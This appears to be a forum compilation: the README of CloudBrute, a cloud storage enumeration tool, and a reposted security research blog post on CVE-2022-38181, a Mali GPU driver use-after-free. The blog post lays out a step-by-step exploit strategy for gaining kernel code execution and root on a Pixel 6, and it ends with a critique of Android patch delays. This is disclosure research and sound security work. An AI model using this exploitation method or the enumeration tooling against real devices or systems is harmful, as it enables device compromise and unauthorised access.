For the IPINFO API, you can register and get a free key at IPINFO. The environments are used to generate URLs, such as test-keyword.target.region and test.keyword.target.region, etc. We provide some wordlists out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool. After setting up your API key, you are ready to use CloudBrute.

```
██████╗██╗      ██████╗ ██╗   ██╗██████╗ ██████╗ ██████╗ ██╗   ██╗████████╗███████╗
██╔════╝██║     ██╔═══██╗██║   ██║██╔══██╗██╔══██╗██╔══██╗██║   ██║╚══██╔══╝██╔════╝
██║     ██║     ██║   ██║██║   ██║██║  ██║██████╔╝██████╔╝██║   ██║   ██║   █████╗
██║     ██║     ██║   ██║██║   ██║██║  ██║██╔══██╗██╔══██╗██║   ██║   ██║   ██╔══╝
╚██████╗███████╗╚██████╔╝╚██████╔╝██████╔╝██████╔╝██║  ██║╚██████╔╝   ██║   ███████╗
 ╚═════╝╚══════╝ ╚═════╝  ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝  ╚═╝ ╚═════╝    ╚═╝   ╚══════╝
                                  V 1.0.7

usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
                  -w|--wordlist "<value>" [-c|--cloud "<value>"]
                  [-t|--threads <integer>] [-T|--timeout <integer>]
                  [-p|--proxy "<value>"] [-a|--randomagent "<value>"]
                  [-D|--debug] [-q|--quite] [-m|--mode "<value>"]
                  [-o|--output "<value>"] [-C|--configFolder "<value>"]

                  Awesome Cloud Enumerator

Arguments:

  -h  --help          Print help information
  -d  --domain        domain
  -k  --keyword       keyword used to generate urls
  -w  --wordlist      path to wordlist
  -c  --cloud         force a search, check config.yaml providers list
  -t  --threads       number of threads. Default: 80
  -T  --timeout       timeout per request in seconds. Default: 10
  -p  --proxy         use proxy list
  -a  --randomagent   user agent randomization
  -D  --debug         show debug logs. Default: false
  -q  --quite         suppress all output. Default: false
  -m  --mode          storage or app. Default: storage
  -o  --output        Output file. Default: out.txt
  -C  --configFolder  Config path. Default: config
```

For example:

```
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"
```

Please note that -k (keyword) is used to generate URLs, so if you want the full domain to be part of the mutation, use it for both the domain (-d) and keyword (-k) arguments.

If a cloud provider is not detected, or you want to force searching on a specific provider, you can use the -c option:

```
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt
```

Dev

- Clone the repo
- go build -o CloudBrute main.go
- go test internal

In action

How to contribute

- Add a module or fix something and then open a pull request.
- Share it with whomever you believe can use it.
- Do the extra work and share your findings with the community ♥

FAQ

How to make the best out of this tool? Read the usage.

I get errors; what should I do? Make sure you read the usage correctly, and if you think you found a bug, open an issue.

When I use proxies, I get too many errors, or it's too slow. That's because you are using public proxies; use private, higher-quality proxies. You can use ProxyFor to verify the good proxies with your chosen provider.

Too fast or too slow? Change the -T (timeout) option to get the best results for your run.

Credits

Inspired by every single repo listed here.

Sursa: https://github.com/0xsha/CloudBrute
Pwning the all Google phone with a non-Google bug

It turns out that the first “all Google” phone includes a non-Google bug. Learn about the details of CVE-2022-38181, a vulnerability in the Arm Mali GPU. Join me on my journey through reporting the vulnerability to the Android security team, and the exploit that used this vulnerability to gain arbitrary kernel code execution and root on a Pixel 6 from an Android app.

Author: Man Yue Mo | January 23, 2023

The “not-Google” bug in the “all-Google” phone

The year is 2021 A.D. The first “all Google” phone, the Pixel 6 series, made entirely by Google, is launched. Well, not entirely… One small GPU chip still holds out. And life is not easy for security researchers who audit the fortified camps of Midgard, Bifrost, and Valhall.1 An unfortunate security researcher was about to learn this the hard way as he wandered into the Arm Mali regime:

CVE-2022-38181

In this post I’ll cover the details of CVE-2022-38181, a vulnerability in the Arm Mali GPU that I reported to the Android security team on 2022-07-12, along with a proof-of-concept exploit that used this vulnerability to gain arbitrary kernel code execution and root privileges on a Pixel 6 from an Android app. The bug was assigned bug ID 238770628. After initially rating it as a High-severity vulnerability, the Android security team later decided to reclassify it as a “Won’t fix” and passed my report to Arm’s security team. I was eventually able to get in touch with Arm’s security team to independently follow up on the issue. The Arm security team were very helpful throughout and released a public patch in version r40p0 of the driver on 2022-10-07 to address the issue, which was considerably quicker than similar disclosures that I had in the past on Android. A coordinated disclosure date of around mid-November was also agreed to allow time for users to apply the patch.
However, I was unable to connect with the Android security team, and the bug was quietly fixed in the January update on the Pixel devices as bug 259695958. Neither the CVE ID nor the bug IDs (the original 238770628 and the new 259695958) were mentioned in the security bulletin. Our advisory, including the disclosure timeline, can be found here.

The Arm Mali GPU

The Arm Mali GPU is a “device-specific” hardware component which can be integrated into various devices, ranging from Android phones to smart TV boxes. For example, all of the international versions of the Samsung S series phones, up to the S21, use the Mali GPU, as do the Pixel 6 series. For additional examples, see “implementations” in the Mali (GPU) Wikipedia entry for some specific devices that use the Mali GPU.

As explained in my other post, GPU drivers on Android are a very attractive target for an attacker, as they can be reached directly from the untrusted app domain, and most Android devices use either Qualcomm’s Adreno GPU or the Arm Mali GPU, meaning that relatively few bugs can cover a large number of devices. In fact, of the seven Android 0-days that were detected as exploited in the wild in 2021, five targeted GPU drivers. Another more recent bug that was exploited in the wild, CVE-2021-39793, disclosed in March 2022, also targeted a GPU driver. Together, of these six in-the-wild exploited bugs that targeted Android GPU drivers, three targeted the Qualcomm GPU, while the other three targeted the Arm Mali GPU.

Due to the complexity involved in managing memory sharing between user space applications and the GPU, many of the vulnerabilities in the Arm Mali GPU involve the memory management code. The current vulnerability is another example of this, and involves a special type of GPU memory: the JIT memory. Contrary to the name, JIT memory does not seem to be related to JIT-compiled code, as it is created as non-executable memory.
Instead, it seems to be used for memory caches, managed by the GPU kernel driver, that can readily be shared with user applications and returned to the kernel when memory pressure arises. Many other types of GPU memory are created directly using ioctl calls like KBASE_IOCTL_MEM_IMPORT. (See, for example, the section “Memory management in the Mali kernel driver” in my previous post.) This, however, is not the case for JIT memory regions, which are created by submitting a special GPU instruction using the KBASE_IOCTL_JOB_SUBMIT ioctl call.

The KBASE_IOCTL_JOB_SUBMIT ioctl can be used to submit a “job chain” to the GPU for processing. Each job chain is basically a list of jobs, which are opaque data structures that contain job headers, followed by payloads that contain the specific instructions. For an example, see the “Writing to GPU memory” section in my previous post. While KBASE_IOCTL_JOB_SUBMIT is normally used for sending instructions to the GPU itself, there are also some jobs that are implemented in the kernel and run on the host (CPU) instead. These are the software jobs (“softjobs”), and among them are jobs that instruct the kernel to allocate and free JIT memory (BASE_JD_REQ_SOFT_JIT_ALLOC and BASE_JD_REQ_SOFT_JIT_FREE).

The life cycle of JIT memory

While KBASE_IOCTL_JOB_SUBMIT is a general purpose ioctl call and contains code paths that are responsible for handling different types of GPU jobs, the BASE_JD_REQ_SOFT_JIT_ALLOC job essentially calls kbase_jit_allocate_process, which then calls kbase_jit_allocate to create a JIT memory region. To understand the lifetime and usage of JIT memory, let me first introduce a few different concepts. When using the Mali GPU driver, a user app first needs to create and initialize a kbase_context kernel object. This involves the user app opening the driver file and using the resulting file descriptor to make a series of ioctl calls.
A kbase_context object is responsible for managing resources for each driver file that is opened and is unique for each file handle. In particular, it has three list_head fields that are responsible for managing JIT memory: the jit_active_head, the jit_pool_head, and the jit_destroy_head. As their names suggest, jit_active_head contains memory that is still in use by the user application, jit_pool_head contains memory regions that are not in use, and jit_destroy_head contains memory regions that are pending to be freed and returned to the kernel. Although both jit_pool_head and jit_destroy_head are used to manage JIT regions that are free, jit_pool_head acts like a memory pool and contains JIT regions that are intended to be reused when new JIT regions are allocated, while jit_destroy_head contains regions that are going to be returned to the kernel.

When kbase_jit_allocate is called, it’ll first try to find a suitable region in the jit_pool_head:

```c
	if (info->usage_id != 0)
		/* First scan for an allocation with the same usage ID */
		reg = find_reasonable_region(info, &kctx->jit_pool_head, false);
	...
	if (reg) {
		...
		list_move(&reg->jit_node, &kctx->jit_active_head);
```

If a suitable region is found, then it’ll be moved to jit_active_head, indicating that it is now in use in userland. Otherwise, a memory region will be created and added to the jit_active_head instead. The region allocated by kbase_jit_allocate, whether it is newly created or reused from jit_pool_head, is then stored in the jit_alloc array of the kbase_context by kbase_jit_allocate_process.

When the user no longer needs the JIT memory, it can send a BASE_JD_REQ_SOFT_JIT_FREE job to the GPU. This then uses kbase_jit_free to free the memory.
However, rather than returning the backing pages of the memory region to the kernel immediately, kbase_jit_free first reduces the backing region to a minimal size and removes any CPU side mapping, so the pages in the region are no longer reachable from the address space of the user process:

```c
void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
	...
	//First reduce the size of the backing region and unmap the freed pages
	old_pages = kbase_reg_current_backed_size(reg);
	if (reg->initial_commit < old_pages) {
		u64 new_size = MAX(reg->initial_commit,
			div_u64(old_pages * (100 - kctx->trim_level), 100));
		u64 delta = old_pages - new_size;
		//Free delta pages in the region and reduces its size to old_pages - delta
		if (delta) {
			mutex_lock(&kctx->reg_lock);
			kbase_mem_shrink(kctx, reg, old_pages - delta);
			mutex_unlock(&kctx->reg_lock);
		}
	}
	...
	//Remove the pages from address space of user process
	kbase_mem_shrink_cpu_mapping(kctx, reg, 0, reg->gpu_alloc->nents);
```

Note that the backing pages of the region (reg) are not completely removed at this stage, and reg is also not going to be freed here. Instead, reg is moved back into jit_pool_head. However, perhaps more interestingly, reg is also moved to the evict_list of the kbase_context:

```c
	kbase_mem_shrink_cpu_mapping(kctx, reg, 0, reg->gpu_alloc->nents);
	...
	mutex_lock(&kctx->jit_evict_lock);
	/* This allocation can't already be on a list. */
	WARN_ON(!list_empty(&reg->gpu_alloc->evict_node));
	//Add reg to evict_list
	list_add(&reg->gpu_alloc->evict_node, &kctx->evict_list);
	atomic_add(reg->gpu_alloc->nents, &kctx->evict_nents);
	//Move reg to jit_pool_head
	list_move(&reg->jit_node, &kctx->jit_pool_head);
```

After kbase_jit_free has completed, its caller, kbase_jit_free_finish, will also clean up the reference stored in jit_alloc when the region was allocated, even though reg is still valid at this stage:

```c
static void kbase_jit_free_finish(struct kbase_jd_atom *katom)
{
	...
	for (j = 0; j != katom->nr_extres; ++j) {
		if ((ids[j] != 0) && (kctx->jit_alloc[ids[j]] != NULL)) {
			...
			if (kctx->jit_alloc[ids[j]] != KBASE_RESERVED_REG_JIT_ALLOC) {
				...
				kbase_jit_free(kctx, kctx->jit_alloc[ids[j]]);
			}
			kctx->jit_alloc[ids[j]] = NULL; //<--------- clean up reference
		}
	}
	...
}
```

As we’ve seen before, the memory region in the jit_pool_head list may now be reused when the user allocates another JIT region. So this explains jit_pool_head and jit_active_head. What about jit_destroy_head?

When JIT memory is freed by calling kbase_jit_free, it is also put on the evict_list. Memory regions in the evict_list are regions that can be freed when memory pressure arises. By putting a JIT region that is no longer in use in the evict_list, the Mali driver can hold onto unused JIT memory for quick reallocation, while returning it to the kernel when the resources are needed.

The Linux kernel provides a mechanism to reclaim unused cached memory, called shrinkers. Kernel components, such as drivers, can define a shrinker object, which, amongst other things, involves defining the count_objects and scan_objects methods:

```c
struct shrinker {
	unsigned long (*count_objects)(struct shrinker *,
				       struct shrink_control *sc);
	unsigned long (*scan_objects)(struct shrinker *,
				      struct shrink_control *sc);
	...
};
```

The custom shrinker can then be registered via the register_shrinker method. When the kernel is under memory pressure, it’ll go through the list of registered shrinkers and use their count_objects method to determine the potential amount of memory that can be freed, and then use scan_objects to free the memory. In the case of the Mali GPU driver, the shrinker is defined and registered in the kbase_mem_evictable_init method:

```c
int kbase_mem_evictable_init(struct kbase_context *kctx)
{
	...
	//kctx->reclaim is a shrinker
	kctx->reclaim.count_objects = kbase_mem_evictable_reclaim_count_objects;
	kctx->reclaim.scan_objects = kbase_mem_evictable_reclaim_scan_objects;
	...
	register_shrinker(&kctx->reclaim);
	return 0;
}
```

The more interesting of these methods is kbase_mem_evictable_reclaim_scan_objects, which is responsible for freeing the memory needed by the kernel.

```c
static unsigned long
kbase_mem_evictable_reclaim_scan_objects(struct shrinker *s,
		struct shrink_control *sc)
{
	...
	list_for_each_entry_safe(alloc, tmp, &kctx->evict_list, evict_node) {
		int err;

		err = kbase_mem_shrink_gpu_mapping(kctx, alloc->reg,
				0, alloc->nents);
		...
		kbase_free_phy_pages_helper(alloc, alloc->evicted);
		...
		list_del_init(&alloc->evict_node);
		...
		kbase_jit_backing_lost(alloc->reg); //<------- moves `reg` to `jit_destroy_pool`
	}
	...
}
```

This is called to remove cached memory in jit_pool_head and return it to the kernel. The function kbase_mem_evictable_reclaim_scan_objects goes through the evict_list, unmaps the backing pages from the GPU (recall that the CPU mapping is already removed in kbase_jit_free) and then frees the backing pages. It then calls kbase_jit_backing_lost to move reg from jit_pool_head to jit_destroy_head:

```c
void kbase_jit_backing_lost(struct kbase_va_region *reg)
{
	...
	list_move(&reg->jit_node, &kctx->jit_destroy_head);

	schedule_work(&kctx->jit_work);
}
```

The memory region in jit_destroy_head is then picked up by the kbase_jit_destroy_worker, which then frees the kbase_va_region in jit_destroy_head and removes references to the kbase_va_region entirely. Well, not entirely… one small pointer still holds out against the clean up logic. And lifetime management is not easy for the pointers in the fortified camps of the Arm Mali regime.
The clean up logic in kbase_mem_evictable_reclaim_scan_objects is not responsible for removing the reference in jit_alloc from when the JIT memory was allocated, but this is not a problem, because as we’ve seen before, this reference was cleared when kbase_jit_free_finish was called to put the region in the evict_list. Normally, a JIT region is only moved to the evict_list when the user frees it via a BASE_JD_REQ_SOFT_JIT_FREE job, which removes the reference stored in jit_alloc. But we don’t do normal things here, nor do the people who seek to compromise devices.

The vulnerability

While the semantics of memory eviction are closely tied to JIT memory, with most eviction functionality referencing “JIT” (for example, the use of kbase_jit_backing_lost in kbase_mem_evictable_reclaim_scan_objects), evictable memory is more general, and other types of GPU memory can also be added to the evict_list and be made evictable. This can be achieved by calling kbase_mem_evictable_make to add memory regions to the evict_list and kbase_mem_evictable_unmake to remove memory regions from it. From userspace, these can be called via the KBASE_IOCTL_MEM_FLAGS_CHANGE ioctl. Depending on whether the BASE_MEM_DONT_NEED flag is passed, a memory region can be added to or removed from the evict_list:

```c
int kbase_mem_flags_change(struct kbase_context *kctx, u64 gpu_addr,
		unsigned int flags, unsigned int mask)
{
	...
	prev_needed = (KBASE_REG_DONT_NEED & reg->flags) == KBASE_REG_DONT_NEED;
	new_needed = (BASE_MEM_DONT_NEED & flags) == BASE_MEM_DONT_NEED;
	if (prev_needed != new_needed) {
		...
		if (new_needed) {
			...
			ret = kbase_mem_evictable_make(reg->gpu_alloc); //<------ Add to `evict_list`
			if (ret)
				goto out_unlock;
		} else {
			kbase_mem_evictable_unmake(reg->gpu_alloc); //<------- Remove from `evict_list`
		}
	}
```

By putting a JIT memory region directly in the evict_list and then creating memory pressure to trigger kbase_mem_evictable_reclaim_scan_objects, the JIT region will be freed with a pointer to it still stored in jit_alloc. After that, a BASE_JD_REQ_SOFT_JIT_FREE job can be submitted to trigger kbase_jit_free_finish to use the freed object pointed to in jit_alloc:

```c
static void kbase_jit_free_finish(struct kbase_jd_atom *katom)
{
	...
	for (j = 0; j != katom->nr_extres; ++j) {
		if ((ids[j] != 0) && (kctx->jit_alloc[ids[j]] != NULL)) {
			...
			if (kctx->jit_alloc[ids[j]] != KBASE_RESERVED_REG_JIT_ALLOC) {
				...
				kbase_jit_free(kctx, kctx->jit_alloc[ids[j]]); //<----- Use of the now freed jit_alloc[ids[j]]
			}
			kctx->jit_alloc[ids[j]] = NULL;
		}
	}
```

Amongst other things, kbase_jit_free will first free some of the backing pages in the now freed kctx->jit_alloc[ids[j]]:

```c
void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
	...
	old_pages = kbase_reg_current_backed_size(reg);
	if (reg->initial_commit < old_pages) {
		...
		u64 delta = old_pages - new_size;
		if (delta) {
			mutex_lock(&kctx->reg_lock);
			kbase_mem_shrink(kctx, reg, old_pages - delta); //<----- Free some pages in the region
			mutex_unlock(&kctx->reg_lock);
		}
	}
```

So by replacing the freed JIT region with a fake object, I can potentially free arbitrary pages, which is a very powerful primitive.

Exploiting the bug

As explained before, this bug is triggered when the kernel is under memory pressure and calls kbase_mem_evictable_reclaim_scan_objects via the shrinker mechanism. From a user process, the required memory pressure can be created as simply as mapping a large amount of memory using the mmap system call. However, the exact amount of memory required to trigger the shrinker scanning is uncertain, meaning that there is no guarantee that a shrinker scan will be triggered after such an allocation. While I could try to allocate an excessive amount of memory to ensure that the shrinker scanning is triggered, doing so risks causing an out-of-memory crash and may also make the object replacement unreliable. This causes problems in triggering and exploiting the bug reliably. It would be good if I could allocate memory incrementally, check whether the JIT region has been freed by kbase_mem_evictable_reclaim_scan_objects after each allocation step, and only proceed with the exploit when I’m sure that the bug has been triggered.

The Mali driver provides an ioctl, KBASE_IOCTL_MEM_QUERY, for querying properties of memory regions at a specific GPU address. If the address is invalid, the ioctl will fail and return an error. This allows me to check whether the JIT region is freed, because when kbase_mem_evictable_reclaim_scan_objects is called to free the JIT region, it’ll first remove its GPU mappings, making its GPU address invalid. By using the KBASE_IOCTL_MEM_QUERY ioctl to query the GPU address of the JIT region after each allocation, I can therefore check whether the region has been freed by kbase_mem_evictable_reclaim_scan_objects or not, and only start spraying the heap to replace the JIT region when it is actually freed. Moreover, the KBASE_IOCTL_MEM_QUERY ioctl doesn’t involve memory allocation, so it won’t interfere with the object replacement. This makes it perfect for testing whether the bug has been triggered.

Although the shrinker is a kernel mechanism for freeing up evictable memory, the scanning and removal of evictable objects via shrinkers is actually performed by the process that is requesting the memory.
So for example, if my process is mapping some memory to its address space (via mmap and then faulting the pages), and the amount of memory that I am mapping creates sufficient memory pressure that a shrinker scan is triggered, then the shrinker scan and the removal of the evictable objects will be done in the context of my process. This, in particular, means that if I pin my process to a CPU while the shrinker scan is triggered, the JIT region that is removed during the scan will be freed on the same CPU. (Strictly speaking, this is not a hundred percent correct, because the JIT region is actually scheduled to be freed on a worker, but most of the time, the worker is indeed executed immediately on the same CPU.)

This helps me to replace the freed JIT region reliably, because when objects are freed in the kernel, they are placed within a per-CPU cache, and subsequent object allocations on the same CPU will first be allocated from the CPU cache. This means that, by allocating another object of similar size on the same CPU, I’m likely to be able to replace the freed JIT region. Moreover, the JIT region, which is a kbase_va_region, is actually a rather large object that is allocated in the kmalloc-256 cache (which is used to allocate objects of size between 256 and 512 bytes when kmalloc is called) instead of the kmalloc-128 cache (which allocates objects of size less than 128 bytes), and the kmalloc-256 cache is a less used cache. This, together with the relative certainty of the CPU that frees the JIT region, allows me to reliably replace the JIT region after it is freed.

Replacing the freed object

Now that I can reliably replace the freed JIT region, I can look at how to exploit the bug. As explained before, the freed JIT memory can be used as the reg argument in the kbase_jit_free function to potentially free arbitrary pages:

```c
void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
	...
	old_pages = kbase_reg_current_backed_size(reg);
	if (reg->initial_commit < old_pages) {
		...
		u64 delta = old_pages - new_size;
		if (delta) {
			mutex_lock(&kctx->reg_lock);
			kbase_mem_shrink(kctx, reg, old_pages - delta); //<----- Free some pages in the region
			mutex_unlock(&kctx->reg_lock);
		}
	}
```

One possibility is to use the well-known heap spraying technique to replace the freed JIT region with arbitrary data using sendmsg. This would enable me to create a fake kbase_va_region with a fake gpu_alloc and fake pages that could be used to free arbitrary pages in kbase_mem_shrink:

```c
int kbase_mem_shrink(struct kbase_context *const kctx,
		struct kbase_va_region *const reg, u64 new_pages)
{
	...
	err = kbase_mem_shrink_gpu_mapping(kctx, reg, new_pages, old_pages);
	if (err >= 0) {
		/* Update all CPU mapping(s) */
		kbase_mem_shrink_cpu_mapping(kctx, reg, new_pages, old_pages);

		kbase_free_phy_pages_helper(reg->cpu_alloc, delta); //<------- free pages in cpu_alloc
		if (reg->cpu_alloc != reg->gpu_alloc)
			kbase_free_phy_pages_helper(reg->gpu_alloc, delta); //<--- free pages in gpu_alloc
```

In order to do so, I’d need to know the addresses of some data that I can control, so I could create a fake gpu_alloc and its pages field at those addresses. This could be done either by finding a way to leak addresses of kernel objects, or by using techniques like the one I wrote about in the section “The Ultimate fake object store” in my other post. But why use a fake object when you can use a real one?

The JIT region that is involved in the use-after-free bug here is a kbase_va_region, which is a complex object that has multiple states. Many operations can only be performed on memory objects with a correct state. In particular, kbase_mem_shrink can only be used on a kbase_va_region that has not been mapped multiple times. The Mali driver provides the KBASE_IOCTL_MEM_ALIAS ioctl, which allows multiple memory regions to share the same backing pages.
I’ve written about how KBASE_IOCTL_MEM_ALIAS works in more detail in my previous post, but for the purpose of this exploit, the crucial point is that KBASE_IOCTL_MEM_ALIAS can be used to create memory regions in the GPU and user address spaces that are aliased to a kbase_va_region, meaning that they are backed by the same physical pages. If a kbase_va_region reg is mapped multiple times by using KBASE_IOCTL_MEM_ALIAS and then has its backing pages freed by kbase_mem_shrink, then only the memory mappings in reg are removed, so the alias regions created by KBASE_IOCTL_MEM_ALIAS can still be used to access the freed backing pages. To prevent kbase_mem_shrink from being called on aliased JIT memory, kbase_mem_alias checks for the KBASE_REG_NO_USER_FREE flag, so that JIT memory cannot be aliased:

```c
u64 kbase_mem_alias(struct kbase_context *kctx, u64 *flags, u64 stride,
		    u64 nents, struct base_mem_aliasing_info *ai,
		    u64 *num_pages)
{
	...
	for (i = 0; i < nents; i++) {
		if (ai[i].handle.basep.handle < BASE_MEM_FIRST_FREE_ADDRESS) {
			if (ai[i].handle.basep.handle !=
			    BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE)
			...
		} else {
			...
			if (aliasing_reg->flags & KBASE_REG_NO_USER_FREE) //<-- 2.
				goto bad_handle; /* JIT regions can't be
						  * aliased. NO_USER_FREE flag
						  * covers the entire lifetime
						  * of JIT regions. The other
						  * types of regions covered
						  * by this flag also shall
						  * not be aliased.
						  */
			...
		}
```

Now suppose I trigger the bug and replace the freed JIT region with a normal memory region allocated via the KBASE_IOCTL_MEM_ALLOC ioctl, which is an object of the exact same type, but without the KBASE_REG_NO_USER_FREE flag that is associated with a JIT region. I then use KBASE_IOCTL_MEM_ALIAS to create an extra mapping for the backing store of this new region. All of this is valid, as I’m just aliasing a normal memory region that does not have the KBASE_REG_NO_USER_FREE flag. However, because of the bug, a dangling pointer in jit_alloc also points to this new region, which has now been aliased.
If I now submit a BASE_JD_REQ_SOFT_JIT_FREE job to call kbase_jit_free on this memory, then kbase_mem_shrink will be called, and part of the backing store in this new region will be freed, but the extra mappings created in the alias region in step 6 will not be removed, meaning that I can still access the freed backing pages from the alias region. By using a real object of the same type, not only do I save the effort needed to craft a fake object, but it also reduces the risk of side effects that could result in a crash.

The situation is now very similar to what I had in my previous post, and the exploit flow from this point on is also very similar. For completeness, I’ll give an overview of how the exploit works here, but interested readers can take a look at more details from the section “Breaking out of the context” onwards in that post. To recap, I now have access to the backing pages of a kbase_va_region object that is already freed, and I’d like to reuse these freed backing pages so I can gain read and write access to arbitrary memory. To understand how this can be done, we need to know how backing pages of a kbase_va_region are allocated. When allocating pages for the backing store of a kbase_va_region, the kbase_mem_pool_alloc_pages function is used:

```c
int kbase_mem_pool_alloc_pages(struct kbase_mem_pool *pool, size_t nr_4k_pages,
		struct tagged_addr *pages, bool partial_allowed)
{
	...
	/* Get pages from this pool */
	while (nr_from_pool--) {
		p = kbase_mem_pool_remove_locked(pool); //<------- 1.
		...
	}
	...
	if (i != nr_4k_pages && pool->next_pool) {
		/* Allocate via next pool */
		err = kbase_mem_pool_alloc_pages(pool->next_pool, //<----- 2.
				nr_4k_pages - i, pages + i, partial_allowed);
		...
	} else {
		/* Get any remaining pages from kernel */
		while (i != nr_4k_pages) {
			p = kbase_mem_alloc_page(pool); //<------- 3.
			...
		}
		...
	}
	...
}
```

The input argument kbase_mem_pool is a memory pool managed by the kbase_context object associated with the driver file that is used to allocate the GPU memory. As the comments suggest, the allocation is actually done in tiers. First the pages are allocated from the current kbase_mem_pool using kbase_mem_pool_remove_locked (1 in the above). If there is not enough capacity in the current kbase_mem_pool to meet the request, then pool->next_pool is used to allocate the pages (2 in the above). If even pool->next_pool does not have the capacity, then kbase_mem_alloc_page is used to allocate pages directly from the kernel via the buddy allocator (the page allocator in the kernel).

When freeing a page, the opposite happens: kbase_mem_pool_free_pages first tries to return the pages to the kbase_mem_pool of the current kbase_context; if the memory pool is full, it’ll try to return the remaining pages to pool->next_pool. If the next pool is also full, then the remaining pages are returned to the kernel by freeing them via the buddy allocator.

As noted in my previous post, pool->next_pool is a memory pool managed by the Mali driver and shared by all the kbase_context objects. It is also used for allocating the page table global directories (PGDs) used by GPU contexts. In particular, this means that, by carefully arranging the memory pools, it is possible to cause a freed backing page in a kbase_va_region to be reused as a PGD of a GPU context. (The details of how to achieve this can be found in my previous post.) As the bottom level PGD stores the physical addresses of the backing pages of GPU virtual memory addresses, being able to write to a PGD allows me to map arbitrary physical pages to the GPU memory, which I can then read from and write to by issuing GPU commands. This gives me access to arbitrary physical memory.
As physical addresses for kernel code and static data are not randomized and depend only on the kernel image, I can use this primitive to overwrite arbitrary kernel code and gain arbitrary kernel code execution. In the following figure, the green block indicates the same page being reused as the PGD.

To summarize, the exploit involves the following steps:

1. Create JIT memory.
2. Mark the JIT memory as evictable.
3. Increase memory pressure by mapping memory to the user space via normal mmap system calls.
4. Use the KBASE_IOCTL_MEM_QUERY ioctl to check if the JIT memory is freed. Carry on applying memory pressure until the JIT region is freed.
5. Allocate new GPU memory regions using the KBASE_IOCTL_MEM_ALLOC ioctl to replace the freed JIT memory.
6. Create an alias region to the new GPU memory region that replaced the JIT memory so that the backing pages of the new GPU memory are shared with the alias region.
7. Submit a BASE_JD_REQ_SOFT_JIT_FREE job to free the JIT region. As the JIT region is now replaced by the new memory region, this will cause kbase_jit_free to remove the backing pages of the new memory region, but the GPU mappings created in the alias region in step 6 will not be removed. The alias region can now be used to access the freed backing pages.
8. Reuse the freed backing pages as a PGD of the kbase_context. The alias region can now be used to rewrite the PGD. I can then map arbitrary physical pages to the GPU address space.
9. Map kernel code to the GPU address space to gain arbitrary kernel code execution, which can then be used to rewrite the credentials of our process to gain root, and to disable SELinux.

The exploit for Pixel 6 can be found here with some setup notes.

Disclosure and patch gapping

At the start of the post, I mentioned that I initially reported this bug to the Android Security team, but it was later dismissed as a "Won't fix" bug.
While it is unclear to me why such a decision was made, it is perhaps worth taking a look at the wider picture instead of treating this as an isolated incident. There has been a long history of N-day vulnerabilities being exploited in the Android kernel, many of which were fixed in the upstream kernel but didn't get ported to Android.

Perhaps the most infamous of these was CVE-2019-2215 (Bad Binder), which was initially discovered by the syzkaller fuzzer in November 2017 and patched in February 2018. However, this fix was never included in an Android monthly security bulletin until it was rediscovered as an exploited in-the-wild bug in September 2019. Another exploited in-the-wild bug, CVE-2021-1048, was introduced in the upstream kernel in December 2020 and was fixed upstream a few weeks later. The patch, however, was not included in the Android Security Bulletin until November 2021, when it was discovered to be exploited in-the-wild. Yet another exploited in-the-wild vulnerability, CVE-2021-0920, was found in 2016, with details visible in a Linux kernel email thread. The report, however, was dismissed by kernel developers at the time, until it was rediscovered to be exploited in-the-wild and patched in November 2021.

To be fair, these cases were patched or ignored upstream without being identified as security issues (for example, CVE-2021-0920 was ignored), making it difficult for any vendor to identify such issues before it's too late. This again shows the importance of properly addressing security issues and recording them by assigning a CVE ID, so that downstream users can apply the relevant security patches. Unfortunately, vendors sometimes see having security vulnerabilities in their products as damage to their reputation and try to silently patch or downplay security issues instead. The above examples show just how serious the consequences of such a mentality can be.
While Android has made improvements to keep the kernel branches more unified and up-to-date to avoid problems such as CVE-2019-2215, where the vulnerability was patched in some branches but not others, some recent disclosures highlight a rather worrying trend.

On March 7th, 2022, CVE-2022-0847 (Dirty Pipe) was disclosed publicly, with full details and a proof-of-concept exploit to overwrite read-only files. While the bug was patched upstream on February 23rd, 2022, with the patch merged into the Android kernel on February 24th, 2022, the patch was not included in the Android Security Bulletin until May 2022, and the public proof-of-concept exploit still ran successfully on a Pixel 6 with the April patch. While this may look like another incident where a security bug was patched silently upstream, this case was very different. According to the disclosure timeline, the bug report was shared with the Android Security Team on February 21st, 2022, a day after it was reported to the Linux kernel.

Another vulnerability, CVE-2021-39793 in the Mali driver, was patched by Arm in version r36p0 of the driver (as CVE-2022-22706), which was released on February 11th, 2022. The patch was only included in the Android Security Bulletin in March, as an exploited in-the-wild bug. Yet another vulnerability, CVE-2022-20186, which I reported to the Android Security Team on January 15th, 2022, was patched by Arm in version r37p0 of the Mali driver, which was released on April 21st, 2022. The patch was only included in the Android Security Bulletin in June, and a Pixel 6 running the May patch was still affected.

Taking a look at security issues reported by Google's Project Zero team, between June and July 2022, Jann Horn of Project Zero reported five security issues (2325, 2327, 2331, 2333, 2334) in the Arm Mali GPU that affected the Pixel phones.
These issues were promptly fixed as CVE-2022-33917 and CVE-2022-36449 by the Arm security team on July 25th, 2022 (CVE-2022-33917 in r39p0) and on August 18th, 2022 (CVE-2022-36449 in r38p1). The details of these bugs, including proofs of concept, were disclosed on September 18th, 2022. However, at least some of the issues remained unfixed in December 2022 (for example, issue 2327 was only fixed silently in the January 2023 patch, without mentioning the CVE ID), after Project Zero published a blog post highlighting the patching problem with these particular issues on November 22nd, 2022.

In all of these instances, the bugs were only patched in Android a couple of months after a patch was publicly released upstream. In light of this, the response to this current bug is perhaps not too surprising. The year is 2023 A.D., and it's still easy to pwn Android with N-days entirely. Well, yes, entirely.

Notes

Observant readers who learn their European history from a certain comic series may recognise the similarities between this and the openings of the Asterix series, which usually start with: "The year is 50 BC. Gaul is entirely occupied by the Romans. Well, not entirely… One small village of indomitable Gauls still holds out against the invaders. And life is not easy for the Roman legionaries who garrison the fortified camps of Totorum, Aquarium, Laudanum and Compendium…"

Sursa: https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug/
-
Krzysztof Pranczk
Jan 3

Security Drone: Scaling Continuous Security at Revolut

Intro

